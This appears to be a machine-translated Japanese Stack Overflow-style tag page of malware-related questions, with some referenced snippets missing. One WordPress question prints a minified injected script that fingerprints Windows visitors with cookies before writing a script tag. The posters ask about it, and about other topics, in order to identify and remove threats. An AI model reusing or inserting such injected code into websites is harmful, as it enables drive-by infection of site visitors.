問題タブ [malware]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
javascript - Javascriptコードのハッキング/インジェクション/操作を困難にする方法は?
誰かがJavascriptを挿入して変数を操作したり、関数にアクセスしたりするのを防ぐ、または十分に困難にする方法はありますか?私が考えたのは、リロードのたびにすべての変数名をランダムに変更して、マルウェアスクリプトを毎回書き直す必要があるようにすることでしたか?それとも、他に痛みの少ない方法がありますか?
最終的に誰かが侵入することは理解していますが、誰もが使用できるブックマークレットなどを公開しないように、アクションの再現を困難にする方法を知りたいと思います。専門家がコードに自分の道を見つけてもかまいませんが、それよりも少し複雑にしたいと思いますjavascript:d=0;
Javascriptのハッキングをもう少し難しくする方法を知っているなら、それらを書いてください。
windows-vista - TBS WMP プラグインを削除するには?
TBS WMP プラグインを削除するには? 私のコンピューターにインストールされたマルウェアのようです。どうもありがとう!
javascript - 私のサイトはChromeによってマルウェアとしてタグ付けされています!今何?
構築していないサイトの開発を完了しています(設計しましたが、これまでに別のサイトで構築しました)。最近、Chromeでサイトにアクセスすると、「マルウェアが検出されました」と表示されます。警告ボックス。
サマーキャンプ用のサイトhttp://kenbrook.org/
で、平均的なマーケティング内容の基本的なパンフレットタイプのサイトです。ModXコンテンツ管理フレームワーク上に構築されており、いくつかのプラグインを使用しています。
これがどのように、何から来たのか、どのように対処するのか、私にはわかりません。このサイト(CSS関連)の別の問題のトラブルシューティングで、別のスタックオーバーフローの質問のユーザーがそのマルウェアの問題についての洞察に言及しました:firefox webdeveloperツールバーを使用してCSSを編集するとき、ツールバーを開いたときに一部の画像が消えるのはなぜですか?
そのスクリプトがサイトに何のためにあるのかさえわかりませんか?!誰かが私にこの問題についての洞察と私がそれを解決し始める方法を教えてもらえますか?私が今責任を負っているので、「元の開発者に戻って、彼にそれを解決させる」という選択肢はありません。
サイトにアクセスしたくない場合は、Chromeからの警告テキストを次に示します。
警告:このサイトにアクセスすると、コンピュータに損害を与える可能性があります。kenbrook.orgのWebサイトには、サイトwww.spiritek.co.jpの要素が含まれています。このマルウェアは、コンピューターに損害を与えたり、ユーザーの同意なしに動作したりする可能性のあるマルウェアをホストしているようです。マルウェアを含むサイトにアクセスするだけで、コンピューターに感染する可能性があります。これらの要素の問題の詳細については、www.spiritek.co.jpのGoogleセーフブラウジング診断ページにアクセスしてください。オンラインで有害なソフトウェアから身を守る方法の詳細をご覧ください。このサイトにアクセスすると、コンピューターに損害を与える可能性があることを理解しています。
security - ホワイトペーパー以外の Virt-ICE に関するドキュメント
最近のBlack Hat カンファレンスで発表されたマルウェア デバッガー/分析ツールである Virt-ICE に関する情報を探しています。私はホワイト ペーパーVirt-ICE: マルウェア分析のための次世代デバッガーを読み、さらに何かを探しています。魅力的で、もっと深く掘り下げてみたいと思います。
これが私が見つけたものです:
security - ハイパーバイザー: ゲスト上で任意のコードを実行できますか?
私は仮想化のセキュリティについて調べていて、悪意のあるシン ハイパーバイザーである Blue Pill に出会いました (プロジェクトの Web サイトはダウンしています。アーカイブ バージョンはこちら: http://web.archive.org/web/20080418123748/http://www.bluepillproject. org/ )。
私の質問は、カスタムの悪意のあるハイパーバイザーが実行フローを変更したり、任意のコードを挿入して実行したり、VM の RAM 内の個人情報を調べたり、その他のことを行うことができるのでしょうか?
マルウェアの観点からこれが実用的かどうかは問いません (これらの機能を実装すると、大規模で非実用的なバックドアになる可能性があります)。悪意のあるハイパーバイザーが、仮想化されたマシンのあらゆる側面を完全に制御できるかどうかに興味があります。
VirtualBox のようなプログラムに関しては、これに違いはありますか? ホスト OS は、いつでもゲスト内で任意のコードを実行できますか?
どんな考えでも大歓迎です!
前もって感謝します、
r3mo
security - オープンソースまたは無料のスパイウェア/マルウェア検出?
会社の広告の掲載場所を制御するシステムを構築しています。私たちの懸念の中には、ターゲット ページ上の潜在的に悪意のあるコードがあります。このコンテンツを検出できる、オープンソースまたは無料のライブラリ/データベース/システムはありますか?
〜ダウナー
wordpress - これは何ですか?Google AnalyticsのCookieまたはマルウェア?
フィッシング操作の標的にされたWordPressのインストールがあります。ヘッダーでこれを見つけた以外は、セキュリティはほとんどカバーされていると思いました。
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
最後のそのURLは非常に疑わしいです。私はグーグルで検索しましたが、リードが見つかりませんでした:-(
WPインストールでコードのソースをまだ見つけていません。テンプレートファイルやデータベースには書き込まれません。WPインストールを今すぐ更新中です。
誰かがこれについて何か知っていますか?
javascript - このJavaScriptは何をしますか?マルウェアに見えます
誰でもそれをデコードできますか?私はすべてのjsfooを試し、jsunpackを調べましたが、理解できません。ブラックリストに載ったサイトがそれを持っていたので、それが原因だと思います。
firefox-addon - セーフ ブラウジング アプリケーション オブジェクトを使用して、URL がフィッシング サイトまたはマルウェア サイトとして報告されているかどうかを判断するにはどうすればよいですか?
コード スニペットは次のとおりです。
それはうまくいきますが、それが「正しい」方法だとは思いません...
ユーザーが DataProvider を変更するとどうなりますか?
python - DJangoDevServerの奇妙な出力ppcfinder.net/judge.php
誰かがこれを見たのだろうか。私はWebアプリを開発していますが、いくつかのテストを行っているときに、開発サーバーは次のように出力します。
/ppcfinder.net/judge.php行が期待されるまでは、このjudge.phpが何をしているのか、どこから来たのかわかりません。Myoutputはで再び始まります
そこに何か厄介なものがあったとしても、何も起こらなかった場合に備えて、すべてのPython/djangoソースを検索しました。私は自分のすべてのソースを検索しましたが、そこにもありません。
一体何なのか、どこから来たのか。先週も見ましたが見つかりませんでした。先週、judge.phpはppcfinder.netURLではなくIPアドレスを介してアクセスされていました。Javascriptをオフにした後でppcfinder.netをチェックアウトしましたが、ゴミ検索サイトのようです。Pythonソースのどこかに何かが埋め込まれていて、何かを盗んでいる場合は少し怖いですが、見つかりません。
誰かがこれを見たことがありますか?
リッチ